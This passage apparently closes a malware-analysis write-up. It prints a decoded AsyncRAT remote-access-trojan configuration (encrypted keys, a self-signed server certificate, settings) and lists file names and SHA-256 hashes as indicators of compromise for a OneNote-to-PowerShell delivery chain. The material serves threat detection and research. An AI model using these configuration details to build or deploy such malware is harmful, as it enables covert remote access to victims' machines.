+ujKsBpIWdLPfGyMbuFNLj3jEZRB8A3pXtaFmhP76kpddBrYTHTuagD5cMD7PyJ+SP/PjXy/X63KZUS6GfaCrpPvY4/tXur8murJ0Iv0OlRzrpmoY77jntEFr8PJn7Xb7QuP1OBMGGtD/YwvVl7nwJY3PV6rZq9GQlawxw5Bk3BQ9csaOB0+8b8sFO7GrdkstUAhp4kEg7mnJAtUq874Rmx17IcGms/qiDJM+8fWnjkUm16HZJ7/WlWCPb7fJx/7bADjkQ0S4FUDzF6xnGPRKcsPkfHV1VtEwW3xao2X8UqY7OZnQgDZPg25CKefQZymRENUBNSw/kXqltkNEJIddFYJV4dtJTMduE2Mxf7IjZFhJsgAlXIi5QSH/3deKIfrgrPMkZYmaBpWEVPHiFFY42MS/mQtP0WoPGCrxdlGEu9PXlAMQYKyknXy6f6Xyx4AAF9icv78q+LJkIVXkZBb0rgi3u4+jC92bF9UUjsCAwfKAFAu3ImShDERUKo0UdhN82AuKEd82Iqwv/ahpFOem1Urs4qOwFnlsojwycpMjtIMLcaGzwSe4JkdJCYlqmHOQuLiEue6JZav4ZK9iIOxEsK1MGCqMGXickHGVQp5W0iO0bH0BqZqkIJ0UJK1Evv7w1UxbfH5MaRUa6guOh6UZhPFX6YO8jKxkPJ1MGjMk+Os9l+rsaaEnPgWzDCsznBv7QriI5D58jxlGx4JCvYWGe/PJfySAm1r+z0M=
Serversignature: Qcf6H60GXB8k7XU89y1GpMcXleNl4PyyrBbzxIzG2/ztlGpimu4P/YTXis20RQP/9Bd+LClqEicaIPJPR/jEhBJeOZoepuKLhOED6A0rjZjefKQIPi95CbejoV1WGVs/TQEWiirIezF8eEkYV/yeK2Ewbwi9lo4miF4LBdQA9q5kWMHxsmTqA15BqVVp6wYuFCXaXV8rbQ2Fxt57dEwgJfHBBouJsTFir9177xGquKWRAGvk4YwuyAAd7Ul24d2r4PodJMvE4r46En0gLHX/95rbDcZYrxWOgX88l4vbyf1LcLhkoXFa0RuIgRFgND8lUgcK8FgNG9sTePscXbawrehCAAPXtTwhkJoUMljxvZdbR/DflmtYjlVFxUBeTme/MO/tR6kusNP6ed9acScjd3Kuc1SM4IUqNY2z9cBPfsswqj6rLLvvZ3Z0nbF+A9GiNFn6JNjQiE+9ESRmM+0ul6gx8asAuo9fmoV1JUII18lNpoUPYkp/LJ1oZV3/QeVdqMdjB41PAzJLdYfmwR9r9y3yimXp3aW9tUNfHCpbpfYAD4K0vYxcnSWTJqVw2pXsWUIa7KEran+iyB/ui7lX9QZsNGPGrdwHuzy/K2z6BpmqP7uinuop7Aw4iuaB10aHB5YK11SYLetU20OnYXldGeuFZGCL0qNriziLdswL2Vw=
ServerCertificate: [Subject]
  CN=AsyncRAT Server

[Issuer]
  CN=AsyncRAT Server

[Serial Number]
  00AFA56C0FA71C2AD47B908F6EA2308D

[Not Before]
  1/1/2023 3:53:23 PM

[Not After]
  12/31/9999 11:59:59 PM

[Thumbprint]
  08A82A722AD7B5376494D7112785B366DA6CF449

Anti: false
aes256: Client.Algorithm.Aes256
Pastebin: null
BDOS: false
Hwid: A8F7444724DA6DACA6D4
Delay: 3
Group: Default

Which pretty much makes our life abit easier with IOC extraction :)

IOC’s

Invoice.one - b11b51ff96dc7a5f1cf9985087a6ad4f66980a2b2a9b1945acd43e39434c8dec
One.bat - 9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8
DotNetLoader.bin - 3c37d7351c091a9c2fce72ecde4bcd1265f148dc3b77017d468e08741091bc50
Ticket_Reprint.pdf - 101e408316eb7997bc4d2a383db92ab5a60da4742ebd7a7b8f15ca5d4d54bebe
AsyncRAT.bin - 00cdee79a9afc1bf239675ba0dc1850da9e4bf9a994bb61d0ec22c9fdd3aa36f
Loader.ps1
Async.ps1